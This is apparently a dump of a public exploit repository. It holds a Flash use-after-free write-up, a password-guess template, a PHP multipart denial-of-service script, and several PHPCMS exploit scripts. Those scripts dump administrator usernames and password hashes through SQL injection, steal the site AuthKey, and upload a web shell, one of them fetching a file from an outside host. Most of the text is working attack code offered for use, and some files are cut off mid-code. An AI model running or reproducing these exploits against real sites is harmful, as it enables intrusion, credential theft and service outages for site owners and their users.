/flash0day/read me.txt:
--------------------------------------------------------------------------------
 1 | 1. BACKGROUND
 2 | http://en.wikipedia.org/wiki/Adobe_Flash_Player
 3 | 
 4 | Congrats! You are reading about the most beautiful Flash bug for the last four
 5 | years since CVE-2010-2161.
 6 | 
 7 | 
 8 | 2. DESCRIPTION
 9 | 
10 | The use-after-free vulnerability exists inside the built-in ByteArray class
11 | http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html
12 | 
13 | Let's create a simple ByteArray object:
14 | 
15 |     var ba:ByteArray = new ByteArray();
16 |     ba.length = 8;
17 |     ba[1] = 1;
18 | 
19 | Now we can access ba[] items and write numeric byte values into ba[].
20 | Also we are allowed to write objects into ByteArray. For example:
21 | 
22 |     var obj = new MyClass();
23 |     ba[0] = obj;
24 | 
25 | AS3 will try to implicitly convert the MyClass object into numeric value by
26 | calling the MyClass.valueOf() method. This method can be easily redefined
27 | within the user's code:
28 | 
29 |     class MyClass
30 |     {
31 |         prototype.valueOf = function()
32 |         {
33 |             ba.length = 88; // reallocate ba[] storage
34 |             return 0;       // return byte for ba[offset]
35 |         }
36 |     }
37 | 
38 | Let's see how that implicit conversion occurs inside the native code:
39 | 
40 |     push esi
41 |     mov  eax, [esp+8]                // the offset value from "ba[offset] = obj"
42 |     push eax
43 |     add  ecx, 0x18                   // ecx = this = "ba" object pointer
44 |     call ByteArray.getStorage()      // gets ba[offset] storage pointer and
45 |     mov  esi, eax                    // saves it in esi
46 | 
47 |     mov  ecx, [esp+0xC]              // "obj" pointer
48 |     push ecx
49 |     call AvmCore.toInteger()         // call MyClass.valueOf()
50 |     add  esp,4
51 |     mov  [esi], al                   // writes returned byte into array
52 | 
53 |     pop  esi
54 |     ret  8
55 | 
56 | On high-level language this will look like:
57 | 
58 |     void ByteArray.setObjInternal(int offset, obj)
59 |     {
60 |         byte* dest = this.getStorage(offset);
61 |         dest* = toInteger(obj);
62 |     }
63 | 
64 | So the array storage pointer is saved in local variable, then AS3 valueOf() is
65 | invoked from the native code and returned byte is written into destination
66 | pointer at the end. If valueOf() changes the length of byte array (see above)
67 | and reallocates its internal storage, then local destination pointer becomes
68 | obsolete and further usage of that pointer can lead to UaF memory corruption.
69 | 
70 | Using this vulnerability, it's very easy to control what byte will be written
71 | and at which offset this corruption will occur.
72 | 
73 | 
74 | 3. AFFECTED SOFTWARE
75 | Adobe Flash Player 9 and higher
76 | 
77 | 
78 | 4. TESTING
79 | Open the test "calc.htm" file in your browser and press the button.
80 | 
81 | on Windows:
82 | Calc.exe should be popped on desktop IE.
83 | Calc.exe should be run as a non-GUI child process in metro IE.
84 | Payload returns 0 from CreateProcessA("calc.exe") inside Chrome/FF sandbox.
85 | 
86 | on OS X:
87 | Calculator is launched in FF or standalone Flash Player projector.
88 | Payload returns 1 from vfork() in Safari sandbox.
89 | 
90 | 
91 | 


--------------------------------------------------------------------------------
/fuzzerpwd/FuzzerPwd.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/fuzzerpwd/FuzzerPwd.py


--------------------------------------------------------------------------------
/fuzzerpwd/README.md:
--------------------------------------------------------------------------------
 1 | ##使用方法:##
 2 |    * python FuzzerPwd.py
 3 |    * 请输入Fuzzer密码的关键字[多个关键字","隔开]:word1,word2,word3
 4 | 
 5 | ##程序步骤:##
 6 |    * 1.读取密码模板文件pwd.yx
 7 |    * 2.将关键字替换模板文件内容
 8 |    * 3.Fuzzer出结果,输出到password.txt文件中
 9 | 
10 | 


--------------------------------------------------------------------------------
/fuzzerpwd/password.txt:
--------------------------------------------------------------------------------
1 | 123


--------------------------------------------------------------------------------
/fuzzerpwd/pwd.yx:
--------------------------------------------------------------------------------
 1 | %username%
 2 | %username%1
 3 | %username%12
 4 | %username%123
 5 | %username%1234
 6 | %username%12345
 7 | %username%123456
 8 | %username%@123
 9 | %username%@123.com
10 | %username%@163
11 | %username%@163.com
12 | %username%163
13 | %username%8
14 | %username%88
15 | %username%888
16 | %username%999
17 | %username%666
18 | %username%@2008
19 | %username%@2009
20 | %username%@2010
21 | %username%@2011
22 | %username%@2012
23 | %username%@2013
24 | %username%@2014
25 | %username%@2015
26 | %username%!@#
27 | %username%.
28 | %username%..
29 | %username%...
30 | %username%1qa
31 | %username%2ws
32 | %username%3ed
33 | %username%test
34 | %username%#test#
35 | testtest
36 | testtest.
37 | testtest..
38 | testtest...


--------------------------------------------------------------------------------
/jboss_exp/jboss_exploit_fat.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/jboss_exp/jboss_exploit_fat.jar


--------------------------------------------------------------------------------
/jboss_exp/test.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/jboss_exp/test.war


--------------------------------------------------------------------------------
/jboss_exp/使用说明.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/jboss_exp/使用说明.txt


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ms15-051", "ms15-051\ms15-051.vcxproj", "{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Release|Win32 = Release|Win32
 9 | 		Release|x64 = Release|x64
10 | 		Release32|Win32 = Release32|Win32
11 | 		Release32|x64 = Release32|x64
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|Win32.ActiveCfg = Release|Win32
15 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|Win32.Build.0 = Release|Win32
16 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|x64.ActiveCfg = Release|x64
17 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|x64.Build.0 = Release|x64
18 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|Win32.ActiveCfg = Release32|Win32
19 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|Win32.Build.0 = Release32|Win32
20 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|x64.ActiveCfg = Release|Win32
21 | 		{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|x64.Build.0 = Release|Win32
22 | 	EndGlobalSection
23 | 	GlobalSection(SolutionProperties) = preSolution
24 | 		HideSolutionNode = FALSE
25 | 	EndGlobalSection
26 | EndGlobal
27 | 


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051.suo


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     控制台应用程序:ms15-051 项目概述
 3 | ========================================================================
 4 | 
 5 | 应用程序向导已为您创建了此 ms15-051 应用程序。
 6 | 
 7 | 本文件概要介绍组成 ms15-051 应用程序的每个文件的内容。
 8 | 
 9 | 
10 | ms15-051.vcxproj
11 |     这是使用应用程序向导生成的 VC++ 项目的主项目文件,
12 |     其中包含生成该文件的 Visual C++ 
13 |     的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
14 | 
15 | ms15-051.vcxproj.filters
16 |     这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。 
17 |     它包含有关项目文件与筛选器之间的关联信息。 在 IDE 
18 |     中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。
19 |     例如,“.cpp”文件与“源文件”筛选器关联。
20 | 
21 | ms15-051.cpp
22 |     这是主应用程序源文件。
23 | 
24 | /////////////////////////////////////////////////////////////////////////////
25 | 其他标准文件:
26 | 
27 | StdAfx.h,StdAfx.cpp
28 |     这些文件用于生成名为 ms15-051.pch 的预编译头 (PCH) 文件和
29 |     名为 StdAfx.obj 的预编译类型文件。
30 | 
31 | /////////////////////////////////////////////////////////////////////////////
32 | 其他注释:
33 | 
34 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
35 | 
36 | /////////////////////////////////////////////////////////////////////////////
37 | 


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/Win32/ms15-051.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/Win32/ms15-051.exe


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/ms15-051.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/ms15-051.cpp


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/ms15-051.vcxproj:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 |   
  4 |     
  5 |       Release32
  6 |       Win32
  7 |     
  8 |     
  9 |       Release32
 10 |       x64
 11 |     
 12 |     
 13 |       Release
 14 |       Win32
 15 |     
 16 |     
 17 |       Release
 18 |       x64
 19 |     
 20 |   
 21 |   
 22 |     {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}
 23 |     Win32Proj
 24 |     ms15051
 25 |   
 26 |   
 27 |   
 28 |     Application
 29 |     false
 30 |     true
 31 |     Unicode
 32 |   
 33 |   
 34 |     Application
 35 |     false
 36 |     true
 37 |     Unicode
 38 |   
 39 |   
 40 |     Application
 41 |     false
 42 |     true
 43 |     Unicode
 44 |   
 45 |   
 46 |     Application
 47 |     false
 48 |     true
 49 |     Unicode
 50 |   
 51 |   
 52 |   
 53 |   
 54 |   
 55 |     
 56 |   
 57 |   
 58 |     
 59 |   
 60 |   
 61 |     
 62 |   
 63 |   
 64 |     
 65 |   
 66 |   
 67 |   
 68 |     false
 69 |     $(Platform)\
 70 |     $(Platform)\
 71 |   
 72 |   
 73 |     false
 74 |     false
 75 |     $(SolutionDir)\OutPut\$(Platform)
 76 |     $(SolutionDir)\Temp
 77 |     $(ProjectName)
 78 |   
 79 |   
 80 |     false
 81 |     $(Platform)\
 82 |     $(Platform)\
 83 |     $(ProjectName)
 84 |     false
 85 |   
 86 |   
 87 |     false
 88 |   
 89 |   
 90 |     
 91 |       Level3
 92 |       
 93 |       
 94 |       MaxSpeed
 95 |       true
 96 |       true
 97 |       WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
 98 |       MultiThreaded
 99 |     
100 |     
101 |       Console
102 |       true
103 |       true
104 |       true
105 |       ntdll.lib;%(AdditionalDependencies)
106 |     
107 |   
108 |   
109 |     
110 |       Level3
111 |       
112 |       
113 |       MaxSpeed
114 |       true
115 |       true
116 |       WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
117 |       MultiThreaded
118 |     
119 |     
120 |       Console
121 |       false
122 |       true
123 |       true
124 |       ntdll.lib;%(AdditionalDependencies)
125 |     
126 |   
127 |   
128 |     
129 |       Level3
130 |       
131 |       
132 |       MaxSpeed
133 |       true
134 |       true
135 |       _WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
136 |       MultiThreaded
137 |     
138 |     
139 |       Console
140 |       false
141 |       true
142 |       true
143 |       ntdll64.lib;%(AdditionalDependencies)
144 |     
145 |   
146 |   
147 |     
148 |       Level3
149 |       
150 |       
151 |       MaxSpeed
152 |       true
153 |       true
154 |       _WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
155 |       MultiThreaded
156 |     
157 |     
158 |       Console
159 |       true
160 |       true
161 |       true
162 |       ntdll64.lib;%(AdditionalDependencies)
163 |     
164 |   
165 |   
166 |     
167 |   
168 |   
169 |     
170 |   
171 |   
172 |   
173 |   
174 | 


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/ms15-051.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 |   
 4 |     
 5 |       {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
 6 |       cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
 7 |     
 8 |     
 9 |       {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 |       h;hpp;hxx;hm;inl;inc;xsd
11 |     
12 |     
13 |       {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 |       rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |     
16 |   
17 |   
18 |     
19 |   
20 |   
21 |     
22 |       源文件
23 |     
24 |   
25 | 


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/ms15-051.vcxproj.user:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/ntdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/ntdll.lib


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/ntdll64.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/ntdll64.lib


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051/ms15-051/x64/ms15-051.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/x64/ms15-051.exe


--------------------------------------------------------------------------------
/ms15-051(修改版)/ms15-051修正版.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051修正版.txt


--------------------------------------------------------------------------------
/ms15-051(修改版)/pic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/pic.png


--------------------------------------------------------------------------------
/php/phpdos.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Author: Shusheng Liu,The Department of Security Cloud, Baidu
 3 | email: liusscs@163.com
 4 | /*  */
 5 | '''
 6 | import sys
 7 | import urllib,urllib2
 8 | import datetime
 9 | from optparse import OptionParser
10 |  
11 | def http_proxy(proxy_url):
12 |  
13 |     proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
14 |     null_proxy_handler = urllib2.ProxyHandler({})
15 |     opener = urllib2.build_opener(proxy_handler)
16 |     urllib2.install_opener(opener)
17 | #end http_proxy 
18 |  
19 | def check_php_multipartform_dos(url,post_body,headers):
20 |     req = urllib2.Request(url)
21 |     for key in headers.keys():
22 |         req.add_header(key,headers[key])
23 |     starttime = datetime.datetime.now();
24 |     fd = urllib2.urlopen(req,post_body)
25 |     html = fd.read()
26 |     endtime = datetime.datetime.now()
27 |     usetime=(endtime - starttime).seconds
28 |     if(usetime > 5):
29 |         result = url+" is vulnerable";
30 |     else:
31 |         if(usetime > 3):
32 |             result = "need to check normal respond time"
33 |     return [result,usetime]
34 | #end
35 |  
36 |  
37 | def main():
38 |     #http_proxy("http://127.0.0.1:8089")
39 |     parser = OptionParser()
40 |     parser.add_option("-t", "--target", action="store", 
41 |                   dest="target", 
42 |                   default=False, 
43 |           type="string",
44 |                   help="test target")
45 |     (options, args) = parser.parse_args()
46 |     if(options.target):
47 |         target = options.target
48 |     else:
49 |         return;
50 |  
51 |     Num=350000
52 |     headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
53 |             'Accept-Encoding':'gzip, deflate',
54 |             'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
55 |     body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
56 |     payload=""
57 |     for i in range(0,Num):
58 |         payload = payload + "a\n"
59 |     body = body + payload;
60 |     body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
61 |     print "starting...";
62 |     respond=check_php_multipartform_dos(target,body,headers)
63 |     print "Result : "
64 |     print respond[0]
65 |     print "Respond time : "+str(respond[1]) + " seconds";
66 |  
67 | if __name__=="__main__":
68 |     main()


--------------------------------------------------------------------------------
/phpcms/PHPCMS2008_comment_注入.php:
--------------------------------------------------------------------------------
  1 | ' . get_info($admin) . PHP_EOL;
 57 |     }
 58 | } else {
 59 |     echo '报告爷,此站不存在此漏洞,请秒下一个!' . PHP_EOL;
 60 | }
 61 | //发送数据包函数
 62 | function send_pack($exp)
 63 | {
 64 |     global $host, $path;
 65 |     $data = "GET " . $path . "/comment/comment.php?action=vote HTTP/1.1\r\n";
 66 |     $data .= "Host: $host\r\n";
 67 |     //$data .= "User-Agent: Baiduspider\r\n";
 68 |     $data .= "Cookie: $exp\r\n";
 69 |     $data .= "Connection: Close\r\n\r\n";
 70 |     //echo $data;
 71 |     $fp = @fsockopen($host, 80, $errno, $errstr, 10);
 72 |     //echo ini_get('default_socket_timeout');//默认超时时间为60秒
 73 |     if (!$fp) {
 74 |         echo $errno . '-->' . $errstr . "\n";
 75 |         exit('Could not connect to: ' . $host);
 76 |     } else {
 77 |         fwrite($fp, $data);
 78 |         $back = '';
 79 |         while (!feof($fp)) {
 80 |             $back .= fread($fp, 1024);
 81 |         }
 82 |         fclose($fp);
 83 |     }
 84 |     return $back;
 85 | }
 86 | 
 87 | //提取返回信息
 88 | function get_info($info)
 89 | {
 90 |     preg_match('/~(.*)~1/i', send_pack($info), $admin_match);
 91 |     if (preg_match('/charset=utf-8/i', send_pack($info))) {
 92 |         return iconv('utf-8', 'gbk//IGNORE', $admin_match[1]);
 93 |     } else {
 94 |         return $admin_match[1];
 95 |     }
 96 | }
 97 | 
 98 | //时间统计函数
 99 | function func_time()
100 | {
101 |     list($microsec, $sec) = explode(' ', microtime());
102 |     return $microsec + $sec;
103 | }
104 | 
105 | echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
106 | ?> 
107 | 


--------------------------------------------------------------------------------
/phpcms/PHPCMS_V9 AuthKey泄露导致注入EXP.php:
--------------------------------------------------------------------------------
  1 |  $admin) {
 41 |         echo '管理员' . ($num + 1) . ' => ' . $admin . PHP_EOL;
 42 |     }
 43 | } else {
 44 |     exit('杯具了大爷,此站漏洞已经修补,请秒下一个!');
 45 | }
 46 | //发送数据包函数
 47 | function get_data($target)
 48 | {
 49 |     //控制http发包参数
 50 |     global $cookie;
 51 |     $opts = array(
 52 |         'http' => array(
 53 |             'method' => "GET",
 54 |             'timeout' => 30,
 55 |             'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0\r\n" .
 56 |                 "Cookie: $cookie\r\n"
 57 |         )
 58 |     );
 59 |     $context = stream_context_create($opts);
 60 |     $content = file_get_contents($target, false, $context);
 61 |     return $content;
 62 | }
 63 | 
 64 | //获取authkey函数
 65 | function authkey()
 66 | {
 67 |     $authkey = '';
 68 |     global $phpcmsv9;
 69 |     $avatar_url = $phpcmsv9 . 'index.php?m=member&c=index&a=account_manage_avatar&t=1';
 70 |     $upurl = get_data($avatar_url);
 71 |     if (preg_match('/\'upurl\':"(.+?)&callback=return_avatar/', $upurl, $match)) {
 72 |         $key_url = base64_decode($match[1]);
 73 |         $key_url = str_replace('uploadavatar', 'getapplist', $key_url);
 74 |         $auth_url = get_data($key_url);
 75 |         if (preg_match('/"authkey";s:32:"(.*?)"/', $auth_url, $au_match)) {
 76 |             echo '成功获取到AuthKey:' . $au_match[1] . "\n\n";
 77 |             $authkey = $au_match[1];
 78 |         }
 79 |     }
 80 |     return $authkey;
 81 | }
 82 | 
 83 | //SQL注入函数
 84 | function sql_inject()
 85 | {
 86 |     global $phpcmsv9;
 87 |     $limit = 10; //默认显示多少个管理员账号
 88 |     $admin = array();
 89 |     $key = authkey();
 90 |     for ($i = 0; $i < $limit; $i++) {
 91 |         $code = sys_auth("action=synlogin&uid=1' and(select 1 from(select count(*),concat((select (select (
 92 |         SELECT distinct concat(0x7e,username,0x3a,password,0x3a,encrypt,0x7e)FROM v9_admin limit $i,1)) from
 93 |         information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#", 'ENCODE', $key);
 94 |         $target = $phpcmsv9 . '/api.php?op=phpsso&code=' . $code;
 95 |         #$target = $phpcmsv9 . 'phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=' . $code;
 96 |         $content = get_data($target);
 97 |         if (preg_match('/~(.+?)~1/', $content, $match)) {
 98 |             $admin[] = $match[1];
 99 |         } else {
100 |             break;
101 |         }
102 |     }
103 |     return $admin;
104 | }
105 | 
106 | //phpcms authkey加密函数
107 | function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0)
108 | {
109 |     $key_length = 4;
110 |     $key = md5($key);
111 |     $fixedkey = hash('md5', $key);
112 |     $egiskeys = md5(substr($fixedkey, 16, 16));
113 |     $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
114 |     $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
115 |     $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
116 |     $i = 0;
117 |     $result = '';
118 |     $string_length = strlen($string);
119 |     for ($i = 0; $i < $string_length; $i++) {
120 |         $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
121 |     }
122 |     if ($operation == 'ENCODE') {
123 |         return $runtokey . str_replace('=', '', base64_encode($result));
124 |     } else {
125 |         if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
126 |             return substr($result, 26);
127 |         } else {
128 |             return '';
129 |         }
130 |     }
131 | }
132 | 
133 | //时间统计函数
134 | function func_time()
135 | {
136 |     list($microsec, $sec) = explode(' ', microtime());
137 |     return $microsec + $sec;
138 | }
139 | 
140 | echo "\n脚本执行时间:" . round((func_time() - $start_time), 4) . '秒';
141 | 


--------------------------------------------------------------------------------
/phpcms/PHPCMS_V9 authkey来getshell.php:
--------------------------------------------------------------------------------
 1 |  0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
35 |             return substr($result, 26);
36 |         } else {
37 |             return '';
38 |         }
39 |     }
40 | }
41 | ?>
42 | 


--------------------------------------------------------------------------------
/phpcms/PHPCMS中转脚本.php:
--------------------------------------------------------------------------------
 1 |  0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
35 |             return substr($result, 26);
36 |         } else {
37 |             return '';
38 |         }
39 |     }
40 | }
41 | ?>
42 | 


--------------------------------------------------------------------------------
/phpcms/Phpcms V9 Upfile%20 Exp.php:
--------------------------------------------------------------------------------
  1 | ';
 30 | $file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
 31 | if($ret=Create_dir($url,$path))
 32 | {
 33 | 	//echo $ret;
 34 | 	$pattern = "|Server:[^,]+?|U";
 35 | 	preg_match_all($pattern, $ret, $matches);
 36 | 	if($matches[0][0])
 37 | 	{
 38 | 		if(strpos($matches[0][0],'Apache') == false)
 39 | 		{
 40 | 			echo "\nÇ×£¡ŽËÍøÕŸ²»ÊÇapacheµÄÍøÕŸ¡£\n";exit;
 41 | 		}
 42 | 	}
 43 | 	$ret = GetShell($url,$phpshell,$path,$file);
 44 | 	$pattern = "|http:\/\/[^,]+?\.,?|U";
 45 | 	preg_match_all($pattern, $ret, $matches);
 46 | 	if($matches[0][0])
 47 | 	{
 48 | 		echo "\n".'ÃÜÂëΪ: '.$pass."\n";
 49 | 		echo "\r\nurlµØÖ·: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
 50 | 	}
 51 | 	else
 52 | 	{	
 53 | 		$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
 54 | 		preg_match_all($pattern, $ret, $matches);
 55 | 		if($matches[0][0])
 56 | 		{
 57 | 			echo "\n".'ÃÜÂëΪ: '.$pass."\n";
 58 | 			echo "\r\nurlµØÖ·:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
 59 | 		}
 60 | 		else
 61 | 		{
 62 | 			echo "\r\nûµÃµœ£¡\n";exit;
 63 | 		}		
 64 | 	}
 65 | }
 66 | 
 67 | function GetShell($url,$shell,$path,$js)
 68 | {
 69 |     $content =$shell;
 70 |     $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n"; 
 71 |     $data .= "Host: ".$url."\r\n";
 72 |     $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
 73 |     $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
 74 |     $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
 75 |     $data .= "Connection: close\r\n";
 76 |     $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
 77 |     $data .= $content."\r\n";
 78 |     $ock=fsockopen($url,80);
 79 |     if (!$ock) 
 80 | 	{
 81 |         echo "\n"."ŽËÍø՟ûÓлØÓŠ,Œì²âurlÊÇ·ñÊäÈëÕýÈ·"."\n";exit;
 82 |     }
 83 | 	else
 84 | 	{
 85 | 		fwrite($ock,$data);
 86 | 		$resp = '';
 87 | 		while (!feof($ock)) 
 88 | 		{
 89 | 			$resp.=fread($ock, 1024);
 90 | 		}
 91 | 		return $resp;
 92 | 	}
 93 | }
 94 | 
 95 | function Create_dir($url,$path='')
 96 | {
 97 |     $content ='I love you';
 98 |     $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n"; 
 99 |     $data .= "Host: ".$url."\r\n";
100 |     $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
101 |     $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
102 |     $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
103 |     $data .= "Connection: close\r\n";
104 |     $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
105 |     $data .= $content."\r\n";
106 |     $ock=fsockopen($url,80);
107 |     if (!$ock) 
108 | 	{
109 |         echo "\n"."ŽËÍø՟ûÓлØÓŠ,Œì²âurlÊÇ·ñÊäÈëÕýÈ·"."\n";exit;
110 |     }
111 | 	fwrite($ock,$data);
112 |     $resp = '';
113 |     while (!feof($ock)) 
114 | 	{
115 |         $resp.=fread($ock, 1024);
116 |     }
117 | 	return $resp;
118 | }
119 | ?>
120 | 


--------------------------------------------------------------------------------
/phpcms/Phpcms V9 uc api SQL Exp.php:
--------------------------------------------------------------------------------
  1 |  126 ))
 37 | {$result.=" .";}
 38 | else
 39 | {$result.=" ".$string[$i];}
 40 | if (strlen(dechex(ord($string[$i])))==2)
 41 | {$exa.=" ".dechex(ord($string[$i]));}
 42 | else
 43 | {$exa.=" 0".dechex(ord($string[$i]));}
 44 | $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 45 | }
 46 | return $exa."\r\n".$result;
 47 | }
 48 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
 49 |  
 50 | function send($packet)
 51 | {
 52 | global $proxy, $host, $port, $html, $proxy_regex;
 53 | if ($proxy=='') {
 54 | $ock=fsockopen(gethostbyname($host),$port);
 55 | if (!$ock) {
 56 | echo 'No response from '.$host.':'.$port; die;
 57 | }
 58 | }
 59 | else {
 60 | $c = preg_match($proxy_regex,$proxy);
 61 | if (!$c) {
 62 | echo 'Not a valid proxy...';die;
 63 | }
 64 | $parts=explode(':',$proxy);
 65 | $parts[1]=(int)$parts[1];
 66 | echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
 67 | $ock=fsockopen($parts[0],$parts[1]);
 68 | if (!$ock) {
 69 | echo 'No response from proxy...';die;
 70 | }
 71 | }
 72 | fputs($ock,$packet);
 73 | if ($proxy=='') {
 74 | $html='';
